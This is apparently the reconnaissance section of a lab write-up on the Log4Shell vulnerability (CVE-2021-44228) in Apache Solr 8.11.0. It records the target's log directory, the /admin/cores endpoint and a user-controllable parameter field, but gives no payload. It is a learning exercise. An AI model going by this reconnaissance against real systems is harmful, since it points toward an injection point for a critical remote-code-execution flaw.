Discovery
This target machine is running Apache Solr 8.11.0, one example of software that is known to include this vulnerable log4j package.
Last updated
This target machine is running Apache Solr 8.11.0, one example of software that is known to include this vulnerable log4j package.
Last updated
I explored the web interface accessible at http://10.10.75.171:8983 and clicked around to get a feel for the application. For more detail on Apache Solr, please refer to their official website. https://solr.apache.org/
This instance of Apache Solr is provisioned with no data whatsoever. It is a flat, vanilla, and absolutely minimum installation -- yet at its core it is still vulnerable to this CVE-2021-44228.
When navigating to http://10.10.75.171:8983. I could see clear indicators that log4j is in use within the application for logging activity. The -Dsolr.log.dir argument was set to, /var/solr/logs
The path/ URL endpoint that is indicated in these repeat entries are - /admin/cores
I also gathered from these log entries that there are some datapoints I could control as a user. Params={} field gave that away.
http://10.10.75.171:8983